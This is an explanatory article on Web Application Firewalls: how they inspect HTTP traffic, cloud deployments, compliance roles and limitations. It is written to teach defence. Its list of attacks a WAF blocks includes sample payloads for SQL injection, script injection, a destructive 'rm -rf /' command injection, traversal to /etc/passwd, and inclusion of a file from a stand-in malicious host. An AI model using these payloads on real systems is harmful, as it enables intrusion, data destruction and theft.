Web Application Firewall (WAF)

What It Is, How It Works, and Why It Matters.

What is a Web Application Firewall (WAF)?

A Web Application Firewall (WAF) is a Layer 7 (application layer) security control that inspects HTTP and HTTPS traffic to and from a web application. Its purpose is to detect and block malicious requests that exploit application-level vulnerabilities.

Unlike traditional firewalls that operate at the network or transport layer, a WAF understands web protocols, URLs, headers, cookies, and request bodies.

WAFs are commonly deployed as:

• Cloud-based services (Cloudflare, AWS WAF, Azure WAF)
• Reverse proxy appliances
• Host-based software modules within web servers

How a WAF Works

A WAF sits in front of a web application and acts as a reverse proxy. It inspects inbound and outbound traffic and applies security rules before requests reach the application.

Typical inspection points include:

• HTTP headers
• URL parameters and query strings
• POST body content (form submissions, APIs)
• Cookies and session tokens

WAFs use:

• Signature-based rules
• Behavioural and anomaly detection
• Rate limiting and bot detection
• Machine learning (in advanced SaaS platforms)

WAF vs Traditional Network Firewall

Why Use a WAF Instead of a Network Firewall?

A network firewall cannot see inside encrypted HTTPS traffic at the application layer. Even with SSL inspection, it does not understand application logic.

A WAF is preferred because it:

• Detects application-layer attacks that bypass perimeter firewalls
• Provides virtual patching for zero-day vulnerabilities
• Protects legacy applications that cannot be easily patched
• Mitigates automated attacks such as credential stuffing and bots
• Helps meet regulatory compliance requirements (for example PCI DSS)

In modern cloud architectures, WAFs are considered mandatory for internet-facing web services.

Common Attacks Blocked by a WAF (With Examples)

1. SQL Injection (SQLi)

Attack Example:

https://site.com/login?user=admin' OR '1'='1

https://site.com/login?user=admin' OR '1'='1

What WAF Does:
Detects SQL keywords and injection patterns in parameters and blocks the request.

2. Cross-Site Scripting (XSS)

Attack Example:

<script>alert('Hacked')</script>

<script>alert('Hacked')</script>

What WAF Does:
Blocks embedded script tags and malicious JavaScript payloads.

3. Command Injection

Attack Example:

; rm -rf /

; rm -rf /

What WAF Does:
Detects shell metacharacters and blocks execution attempts.

4. Path Traversal

Attack Example:

../../../../etc/passwd

../../../../etc/passwd

What WAF Does:
Detects directory traversal patterns and prevents sensitive file access.

5. Remote File Inclusion (RFI)

Attack Example:

http://site.com/page.php?file=http://evil.com/malware.txt

http://site.com/page.php?file=http://evil.com/malware.txt

What WAF Does:
Blocks external file inclusion attempts.

6. Credential Stuffing and Brute Force

Attack Example:
Automated login attempts using leaked username and password lists.

What WAF Does:
Rate limits requests, detects automation, and blocks bots.

7. DDoS at the Application Layer (Layer 7)

Attack Example:
Massive HTTP GET floods that look legitimate.

What WAF Does:
Uses behavioural analysis, CAPTCHA challenges, and rate limiting.

Types of WAF

Network-Based WAF

Hardware appliance deployed in a data centre. High performance but expensive.

Host-Based WAF

Installed directly on the web server as software or modules (for example ModSecurity).

Cloud-Based WAF (SaaS)

Delivered as a managed service. Scales automatically and integrates with CDN platforms.

Cloud-based WAFs are the dominant model today.

WAF in Cloud Platforms

AWS

• AWS WAF integrated with CloudFront and Application Load Balancer

Microsoft Azure

• Azure WAF integrated with Application Gateway and Front Door

Cloudflare

• Global edge-based WAF with integrated CDN and DDoS mitigation

Cloud WAFs provide:

• Global traffic scrubbing
• TLS termination
• Threat intelligence feeds
• Bot management

WAF in Compliance Frameworks

WAFs are explicitly referenced in security standards:

• PCI DSS: Requirement 6.6 mandates a WAF or secure code review
• ISO 27001: Web security controls in Annex A
• NIST SP 800-53: System and communications protection controls

A WAF is often a compensating control when legacy applications cannot be patched.

Limitations and Bypass Techniques

A WAF is not a silver bullet.

Limitations include:

• False positives blocking legitimate users
• False negatives due to evasion techniques
• Encrypted payloads if TLS termination is not enabled
• Logic flaws and business logic attacks are often invisible
• Skilled attackers can bypass poorly tuned rule sets

Security engineers must tune rules and monitor logs continuously.

WAF Logging and SOC Use

WAF logs are valuable for:

• Detecting exploitation attempts
• Threat hunting (SQLi, XSS probes)
• Incident response timeline reconstruction
• SIEM ingestion and correlation

Common log fields:

• Source IP
• URI path and parameters
• Action taken (allow, block, challenge)
• Rule ID triggered

WAF vs Secure Coding

A WAF does not replace secure development.
It is a defence-in-depth control that reduces risk while vulnerabilities are fixed.

Security engineers should treat WAFs as:

• A shield for production systems
• A temporary mitigation for zero-days
• A telemetry source for application attacks

Interview Talking Points for Cyber Security Engineers

• WAF operates at Layer 7, unlike network firewalls at Layers 3 and 4
• Essential for OWASP Top 10 protection
• Used for virtual patching and legacy system protection
• Key control for PCI DSS compliance
• Generates valuable telemetry for SOC detection engineering
• Must be tuned to avoid false positives and bypasses

Summary

A Web Application Firewall is a critical security control that protects web applications from modern attack techniques that traditional firewalls cannot detect. In cloud-native architectures, WAFs are a standard baseline control alongside EDR, SIEM, and IAM.